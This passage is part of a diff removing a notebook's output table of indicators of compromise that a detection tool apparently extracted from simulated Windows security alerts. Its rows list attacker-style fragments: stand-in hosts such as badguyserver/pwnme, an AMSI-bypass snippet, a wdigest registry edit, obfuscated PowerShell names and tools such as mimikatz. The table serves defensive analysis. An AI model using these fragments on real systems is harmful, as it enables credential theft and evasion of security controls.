-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>54</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\n^e^t</td>\n",
-       "      <td>38</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>55</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell</td>\n",
-       "      <td>39</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>56</th>\n",
-       "      <td>md5_hash</td>\n",
-       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
-       "      <td>40</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>57</th>\n",
-       "      <td>md5_hash</td>\n",
-       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
-       "      <td>41</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>58</th>\n",
-       "      <td>md5_hash</td>\n",
-       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
-       "      <td>44</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>59</th>\n",
-       "      <td>url</td>\n",
-       "      <td>http://badguyserver/pwnme\"</td>\n",
-       "      <td>46</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>60</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>badguyserver</td>\n",
-       "      <td>46</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>61</th>\n",
-       "      <td>url</td>\n",
-       "      <td>http://badguyserver/pwnme\"</td>\n",
-       "      <td>47</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>62</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>badguyserver</td>\n",
-       "      <td>47</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>63</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell</td>\n",
-       "      <td>47</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>64</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell</td>\n",
-       "      <td>48</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>65</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell</td>\n",
-       "      <td>49</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>66</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell</td>\n",
-       "      <td>50</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>67</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rUnDlL32</td>\n",
-       "      <td>58</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>68</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg  query add mscfile\\\\\\\\open</td>\n",
-       "      <td>59</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>69</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>60</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>70</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\dubrute.exe</td>\n",
-       "      <td>61</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>71</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\nlbrute.exe</td>\n",
-       "      <td>62</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>72</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\system\\CurrentControlSet\\Control\\Terminal</td>\n",
-       "      <td>63</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>73</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>63</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>74</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\system\\CurrentControlSet\\Control\\Terminal</td>\n",
-       "      <td>64</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>75</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>64</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>76</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\\\tsclient\\c</td>\n",
-       "      <td>65</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>77</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\Microsoft\\Windows\\CurrentVersion Certificate).Certificate);.\\powershell</td>\n",
-       "      <td>67</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>78</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Windows\\System32\\mshta.exe</td>\n",
-       "      <td>67</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>79</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell.exe</td>\n",
-       "      <td>67</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>80</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\netsh</td>\n",
-       "      <td>68</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>81</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\users\\Bob\\appdata\\Roaming\\RbtGskQ\\RbtGskQ.exe</td>\n",
-       "      <td>68</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>82</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg  add HKLM\\KEY_LOCAL_MACHINE\\...securityproviders\\wdigest</td>\n",
-       "      <td>69</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>83</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Windows\\System32\\cmd.exe</td>\n",
-       "      <td>70</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>84</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\scrsave.scr</td>\n",
-       "      <td>71</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>85</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\svchost.exe</td>\n",
-       "      <td>72</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>86</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\smss.exe</td>\n",
-       "      <td>73</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>87</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Windows\\System32\\svchost.exe</td>\n",
-       "      <td>74</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>88</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>system.management.automation.amsiutils</td>\n",
-       "      <td>77</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>89</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...</td>\n",
-       "      <td>77</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>90</th>\n",
-       "      <td>url</td>\n",
-       "      <td>http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...</td>\n",
-       "      <td>77</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>91</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell.exe</td>\n",
-       "      <td>77</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>92</th>\n",
-       "      <td>ipv4</td>\n",
-       "      <td>1.2.3.4</td>\n",
-       "      <td>78</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>93</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt</td>\n",
-       "      <td>78</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>94</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\wuauclt.exe</td>\n",
-       "      <td>79</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>95</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\softwaredistribution\\cscript.exe</td>\n",
-       "      <td>79</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>96</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\softwaredistribution\\cscript.exe</td>\n",
-       "      <td>80</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>97</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\lsass.exe</td>\n",
-       "      <td>80</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>98</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\system32\\wscript.exe</td>\n",
-       "      <td>82</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>99</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\inetpub\\wwwroot</td>\n",
-       "      <td>83</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>100</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\system32\\inetsrv\\appcmd</td>\n",
-       "      <td>83</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>101</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\2840.exe</td>\n",
-       "      <td>84</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>102</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\a_keygen.exe</td>\n",
-       "      <td>85</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>103</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\bittorrent.exe</td>\n",
-       "      <td>87</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>104</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\netsh.exe</td>\n",
-       "      <td>88</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>105</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\ransomware.exe</td>\n",
-       "      <td>90</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>106</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\\\server\\payload.dll</td>\n",
-       "      <td>92</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>107</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Users\\Administrator\\AppData\\Roaming\\{RANDOM}.txt</td>\n",
-       "      <td>94</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>108</th>\n",
-       "      <td>ipv4</td>\n",
-       "      <td>127.0.0.1</td>\n",
-       "      <td>102</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>109</th>\n",
-       "      <td>url</td>\n",
-       "      <td>http://127.0.0.1/</td>\n",
-       "      <td>102</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>110</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\\MyNastySvcHostConfig</td>\n",
-       "      <td>103</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>111</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>103</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>112</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\\MyNastySvcHostConfig</td>\n",
-       "      <td>104</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>113</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>104</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>114</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Users\\MSTICA~1\\AppData\\Local\\Temp\\hd.exe</td>\n",
-       "      <td>105</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>115</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\\\.\\pipe\\blahtest</td>\n",
-       "      <td>107</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>116</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg.exe</td>\n",
-       "      <td>108</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>117</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\console</td>\n",
-       "      <td>108</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>118</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\fonts\\csrss.exe</td>\n",
-       "      <td>109</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>119</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\fonts\\conhost.exe</td>\n",
-       "      <td>110</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>120</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\mimikatz.exe</td>\n",
-       "      <td>111</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>121</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32.exe</td>\n",
-       "      <td>112</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>122</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\fonts\\conhost.exe</td>\n",
-       "      <td>112</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>123</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\regsvr32</td>\n",
-       "      <td>113</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>124</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\fonts\\csrss.exe</td>\n",
-       "      <td>113</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>125</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp</td>\n",
-       "      <td>115</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>126</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\WindowsSimulateDetections.bat</td>\n",
-       "      <td>115</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>127</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Windows\\System32\\win32calc.exe</td>\n",
-       "      <td>116</td>\n",
-       "    </tr>\n",
-       "  </tbody>\n",
-       "</table>\n",
-       "</div>"
-      ],
-      "text/plain": [
-       "          IoCType  \\\n",
-       "0    windows_path   \n",
-       "1    windows_path   \n",
-       "2    windows_path   \n",
-       "3    windows_path   \n",
-       "4    windows_path   \n",
-       "5    windows_path   \n",
-       "6    windows_path   \n",
-       "7    windows_path   \n",
-       "8    windows_path   \n",
-       "9    windows_path   \n",
-       "10   windows_path   \n",
-       "11            dns   \n",
-       "12            dns   \n",
-       "13            dns   \n",
-       "14   windows_path   \n",
-       "15   windows_path   \n",
-       "16   windows_path   \n",
-       "17   windows_path   \n",
-       "18   windows_path   \n",
-       "19   windows_path   \n",
-       "20   windows_path   \n",
-       "21   windows_path   \n",
-       "22   windows_path   \n",
-       "23   windows_path   \n",
-       "24   windows_path   \n",
-       "25   windows_path   \n",
-       "26   windows_path   \n",
-       "27   windows_path   \n",
-       "28   windows_path   \n",
-       "29   windows_path   \n",
-       "30   windows_path   \n",
-       "31   windows_path   \n",
-       "32   windows_path   \n",
-       "33   windows_path   \n",
-       "34   windows_path   \n",
-       "35   windows_path   \n",
-       "36            dns   \n",
-       "37   windows_path   \n",
-       "38   windows_path   \n",
-       "39   windows_path   \n",
-       "40   windows_path   \n",
-       "41   windows_path   \n",
-       "42            url   \n",
-       "43            dns   \n",
-       "44   windows_path   \n",
-       "45   windows_path   \n",
-       "46   windows_path   \n",
-       "47   windows_path   \n",
-       "48   windows_path   \n",
-       "49            url   \n",
-       "50            dns   \n",
-       "51   windows_path   \n",
-       "52   windows_path   \n",
-       "53   windows_path   \n",
-       "54   windows_path   \n",
-       "55   windows_path   \n",
-       "56       md5_hash   \n",
-       "57       md5_hash   \n",
-       "58       md5_hash   \n",
-       "59            url   \n",
-       "60            dns   \n",
-       "61            url   \n",
-       "62            dns   \n",
-       "63   windows_path   \n",
-       "64   windows_path   \n",
-       "65   windows_path   \n",
-       "66   windows_path   \n",
-       "67   windows_path   \n",
-       "68   windows_path   \n",
-       "69   windows_path   \n",
-       "70   windows_path   \n",
-       "71   windows_path   \n",
-       "72   windows_path   \n",
-       "73   windows_path   \n",
-       "74   windows_path   \n",
-       "75   windows_path   \n",
-       "76   windows_path   \n",
-       "77   windows_path   \n",
-       "78   windows_path   \n",
-       "79   windows_path   \n",
-       "80   windows_path   \n",
-       "81   windows_path   \n",
-       "82   windows_path   \n",
-       "83   windows_path   \n",
-       "84   windows_path   \n",
-       "85   windows_path   \n",
-       "86   windows_path   \n",
-       "87   windows_path   \n",
-       "88            dns   \n",
-       "89            dns   \n",
-       "90            url   \n",
-       "91   windows_path   \n",
-       "92           ipv4   \n",
-       "93   windows_path   \n",
-       "94   windows_path   \n",
-       "95   windows_path   \n",
-       "96   windows_path   \n",
-       "97   windows_path   \n",
-       "98   windows_path   \n",
-       "99   windows_path   \n",
-       "100  windows_path   \n",
-       "101  windows_path   \n",
-       "102  windows_path   \n",
-       "103  windows_path   \n",
-       "104  windows_path   \n",
-       "105  windows_path   \n",
-       "106  windows_path   \n",
-       "107  windows_path   \n",
-       "108          ipv4   \n",
-       "109           url   \n",
-       "110  windows_path   \n",
-       "111  windows_path   \n",
-       "112  windows_path   \n",
-       "113  windows_path   \n",
-       "114  windows_path   \n",
-       "115  windows_path   \n",
-       "116  windows_path   \n",
-       "117  windows_path   \n",
-       "118  windows_path   \n",
-       "119  windows_path   \n",
-       "120  windows_path   \n",
-       "121  windows_path   \n",
-       "122  windows_path   \n",
-       "123  windows_path   \n",
-       "124  windows_path   \n",
-       "125  windows_path   \n",
-       "126  windows_path   \n",
-       "127  windows_path   \n",
-       "\n",
-       "                                                                                              Observable  \\\n",
-       "0                                                                                 C:\\RECYCLER\\xxppyy.exe   \n",
-       "1                                                                                                  .\\ftp   \n",
-       "2                                                                                                  .\\reg   \n",
-       "3                                                                                             .\\rundll32   \n",
-       "4                                                                          c:\\users\\MSTICAdmin\\12345.exe   \n",
-       "5                                                                                             .\\rundll32   \n",
-       "6                                                                                             .\\rundll32   \n",
-       "7                                                                           c:\\users\\MSTICAdmin\\1234.exe   \n",
-       "8                                                                                             .\\rundll32   \n",
-       "9                                                                                             .\\rundll32   \n",
-       "10                                                  .\\reg.exe  add \\hkcu\\software\\microsoft\\some\\key\\Run   \n",
-       "11                                                                                     tsetup.1.0.14.exe   \n",
-       "12                                                                                          tsetup.1.exe   \n",
-       "13                                                                                     tsetup.1.0.14.tmp   \n",
-       "14                                                                   c:\\Diagnostics\\UserTmp\\tsetup.1.exe   \n",
-       "15                                                       C:\\Users\\MSTICAdmin\\Downloads\\tsetup.1.0.14.exe   \n",
-       "16                               C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetup.1.0.14.tmp   \n",
-       "17                                                                                        .\\rundll32.exe   \n",
-       "18                                                                                           .\\netsh.exe   \n",
-       "19                                                                                                 .\\cmd   \n",
-       "20                                                                                    C:\\inetpub\\wwwroot   \n",
-       "21                                                                                                 .\\cmd   \n",
-       "22                                                                                    C:\\inetpub\\wwwroot   \n",
-       "23                                                                                                 .\\cmd   \n",
-       "24                                                                                    C:\\inetpub\\wwwroot   \n",
-       "25                                                                                                 .\\cmd   \n",
-       "26                                                            \\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents   \n",
-       "27                                                                                        C:\\ProgramData   \n",
-       "28                                                                                                 .\\cmd   \n",
-       "29                                                                                    C:\\inetpub\\wwwroot   \n",
-       "30                                                                    c:\\windows\\system32\\inetsrv\\appcmd   \n",
-       "31                                                                                                 .\\cmd   \n",
-       "32                                                                                    C:\\inetpub\\wwwroot   \n",
-       "33                                                                       C:\\inetpub\\logs\\logFiles\\W3SVC1   \n",
-       "34                                                                      c:\\Diagnostics\\UserTmp\\perfc.dat   \n",
-       "35                                                     c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe   \n",
-       "36                                                                               doubleextension.pdf.exe   \n",
-       "37                                                        c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe   \n",
-       "38                                                                         \\Windows\\system32\\conhost.exe   \n",
-       "39                                                                                                   \\C:   \n",
-       "40                                                                                          c:\\testshare   \n",
-       "41                                                                           \\\\MSTICAlertsWin1\\TestShare   \n",
-       "42                                                                                http://server/file.sct   \n",
-       "43                                                                                                server   \n",
-       "44                                                                                            .\\regsvr32   \n",
-       "45                                                                                         .\\suchost.exe   \n",
-       "46                                                                                           .\\evil.ps1;   \n",
-       "47                                                                                      .\\powershell.exe   \n",
-       "48                                                                                          .\\powershell   \n",
-       "49                                                            http://somedomain/best-kitten-names-1.jpg'   \n",
-       "50                                                                                            somedomain   \n",
-       "51                                                                    \\AppData\\Local\\Temp\\kittens1.jpg';   \n",
-       "52                                                                                C:\\Users\\$env:UserName   \n",
-       "53                                                                                 .\\pOWErS^H^ElL^.eX^e^   \n",
-       "54                                                                                               .\\n^e^t   \n",
-       "55                                                                                          .\\powershell   \n",
-       "56                                                                     aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa    \n",
-       "57                                                                     aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa    \n",
-       "58                                                                      81ed03caf6901e444c72ac67d192fb9c   \n",
-       "59                                                                            http://badguyserver/pwnme\"   \n",
-       "60                                                                                          badguyserver   \n",
-       "61                                                                            http://badguyserver/pwnme\"   \n",
-       "62                                                                                          badguyserver   \n",
-       "63                                                                                          .\\powershell   \n",
-       "64                                                                                          .\\powershell   \n",
-       "65                                                                                          .\\powershell   \n",
-       "66                                                                                          .\\powershell   \n",
-       "67                                                                                            .\\rUnDlL32   \n",
-       "68                                                                      .\\reg  query add mscfile\\\\\\\\open   \n",
-       "69                                                                                                 .\\reg   \n",
-       "70                                                                                         .\\dubrute.exe   \n",
-       "71                                                                                         .\\nlbrute.exe   \n",
-       "72                                                            \\system\\CurrentControlSet\\Control\\Terminal   \n",
-       "73                                                                                                 .\\reg   \n",
-       "74                                                            \\system\\CurrentControlSet\\Control\\Terminal   \n",
-       "75                                                                                                 .\\reg   \n",
-       "76                                                                                          \\\\tsclient\\c   \n",
-       "77                              \\Microsoft\\Windows\\CurrentVersion Certificate).Certificate);.\\powershell   \n",
-       "78                                                                         C:\\Windows\\System32\\mshta.exe   \n",
-       "79                                                                                      .\\powershell.exe   \n",
-       "80                                                                                               .\\netsh   \n",
-       "81                                                      c:\\users\\Bob\\appdata\\Roaming\\RbtGskQ\\RbtGskQ.exe   \n",
-       "82                                        .\\reg  add HKLM\\KEY_LOCAL_MACHINE\\...securityproviders\\wdigest   \n",
-       "83                                                                           c:\\Windows\\System32\\cmd.exe   \n",
-       "84                                                                    c:\\Diagnostics\\UserTmp\\scrsave.scr   \n",
-       "85                                                                    c:\\Diagnostics\\UserTmp\\svchost.exe   \n",
-       "86                                                                       c:\\Diagnostics\\UserTmp\\smss.exe   \n",
-       "87                                                                       c:\\Windows\\System32\\svchost.exe   \n",
-       "88                                                                system.management.automation.amsiutils   \n",
-       "89   system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...   \n",
-       "90   http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...   \n",
-       "91                                                                                      .\\powershell.exe   \n",
-       "92                                                                                               1.2.3.4   \n",
-       "93                                                    C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt   \n",
-       "94                                                                                         .\\wuauclt.exe   \n",
-       "95                                                           c:\\windows\\softwaredistribution\\cscript.exe   \n",
-       "96                                                           c:\\windows\\softwaredistribution\\cscript.exe   \n",
-       "97                                                                                           .\\lsass.exe   \n",
-       "98                                                                       c:\\windows\\system32\\wscript.exe   \n",
-       "99                                                                                    C:\\inetpub\\wwwroot   \n",
-       "100                                                                   c:\\windows\\system32\\inetsrv\\appcmd   \n",
-       "101                                                                      c:\\Diagnostics\\UserTmp\\2840.exe   \n",
-       "102                                                                  c:\\Diagnostics\\UserTmp\\a_keygen.exe   \n",
-       "103                                                                c:\\Diagnostics\\UserTmp\\bittorrent.exe   \n",
-       "104                                                                     c:\\Diagnostics\\UserTmp\\netsh.exe   \n",
-       "105                                                                c:\\Diagnostics\\UserTmp\\ransomware.exe   \n",
-       "106                                                                                 \\\\server\\payload.dll   \n",
-       "107                                                  C:\\Users\\Administrator\\AppData\\Roaming\\{RANDOM}.txt   \n",
-       "108                                                                                            127.0.0.1   \n",
-       "109                                                                                    http://127.0.0.1/   \n",
-       "110                           \\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\\MyNastySvcHostConfig   \n",
-       "111                                                                                                .\\reg   \n",
-       "112                           \\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\\MyNastySvcHostConfig   \n",
-       "113                                                                                                .\\reg   \n",
-       "114                                                          C:\\Users\\MSTICA~1\\AppData\\Local\\Temp\\hd.exe   \n",
-       "115                                                                                    \\\\.\\pipe\\blahtest   \n",
-       "116                                                                                            .\\reg.exe   \n",
-       "117                                                                                             \\console   \n",
-       "118                                                                           c:\\windows\\fonts\\csrss.exe   \n",
-       "119                                                                         c:\\windows\\fonts\\conhost.exe   \n",
-       "120                                                                                       .\\mimikatz.exe   \n",
-       "121                                                                                       .\\rundll32.exe   \n",
-       "122                                                                         c:\\windows\\fonts\\conhost.exe   \n",
-       "123                                                                                           .\\regsvr32   \n",
-       "124                                                                           c:\\windows\\fonts\\csrss.exe   \n",
-       "125                                                                               c:\\Diagnostics\\UserTmp   \n",
-       "126                                                         c:\\Diagnostics\\WindowsSimulateDetections.bat   \n",
-       "127                                                                    C:\\Windows\\System32\\win32calc.exe   \n",
-       "\n",
-       "    SourceIndex  \n",
-       "0             0  \n",
-       "1             0  \n",
-       "2             1  \n",
-       "3             3  \n",
-       "4             4  \n",
-       "5             4  \n",
-       "6             5  \n",
-       "7             6  \n",
-       "8             6  \n",
-       "9             7  \n",
-       "10            8  \n",
-       "11            9  \n",
-       "12            9  \n",
-       "13            9  \n",
-       "14            9  \n",
-       "15            9  \n",
-       "16            9  \n",
-       "17           10  \n",
-       "18           11  \n",
-       "19           12  \n",
-       "20           12  \n",
-       "21           13  \n",
-       "22           13  \n",
-       "23           14  \n",
-       "24           14  \n",
-       "25           15  \n",
-       "26           15  \n",
-       "27           15  \n",
-       "28           16  \n",
-       "29           16  \n",
-       "30           16  \n",
-       "31           17  \n",
-       "32           17  \n",
-       "33           17  \n",
-       "34           18  \n",
-       "35           19  \n",
-       "36           20  \n",
-       "37           20  \n",
-       "38           22  \n",
-       "39           22  \n",
-       "40           26  \n",
-       "41           27  \n",
-       "42           31  \n",
-       "43           31  \n",
-       "44           31  \n",
-       "45           32  \n",
-       "46           35  \n",
-       "47           35  \n",
-       "48           36  \n",
-       "49           37  \n",
-       "50           37  \n",
-       "51           37  \n",
-       "52           37  \n",
-       "53           37  \n",
-       "54           38  \n",
-       "55           39  \n",
-       "56           40  \n",
-       "57           41  \n",
-       "58           44  \n",
-       "59           46  \n",
-       "60           46  \n",
-       "61           47  \n",
-       "62           47  \n",
-       "63           47  \n",
-       "64           48  \n",
-       "65           49  \n",
-       "66           50  \n",
-       "67           58  \n",
-       "68           59  \n",
-       "69           60  \n",
-       "70           61  \n",
-       "71           62  \n",
-       "72           63  \n",
-       "73           63  \n",
-       "74           64  \n",
-       "75           64  \n",
-       "76           65  \n",
-       "77           67  \n",
-       "78           67  \n",
-       "79           67  \n",
-       "80           68  \n",
-       "81           68  \n",
-       "82           69  \n",
-       "83           70  \n",
-       "84           71  \n",
-       "85           72  \n",
-       "86           73  \n",
-       "87           74  \n",
-       "88           77  \n",
-       "89           77  \n",
-       "90           77  \n",
-       "91           77  \n",
-       "92           78  \n",
-       "93           78  \n",
-       "94           79  \n",
-       "95           79  \n",
-       "96           80  \n",
-       "97           80  \n",
-       "98           82  \n",
-       "99           83  \n",
-       "100          83  \n",
-       "101          84  \n",
-       "102          85  \n",
-       "103          87  \n",
-       "104          88  \n",
-       "105          90  \n",
-       "106          92  \n",
-       "107          94  \n",
-       "108         102  \n",
-       "109         102  \n",
-       "110         103  \n",
-       "111         103  \n",
-       "112         104  \n",
-       "113         104  \n",
-       "114         105  \n",
-       "115         107  \n",
-       "116         108  \n",
-       "117         108  \n",
-       "118         109  \n",
-       "119         110  \n",
-       "120         111  \n",
-       "121         112  \n",
-       "122         112  \n",
-       "123         113  \n",
-       "124         113  \n",
-       "125         115  \n",
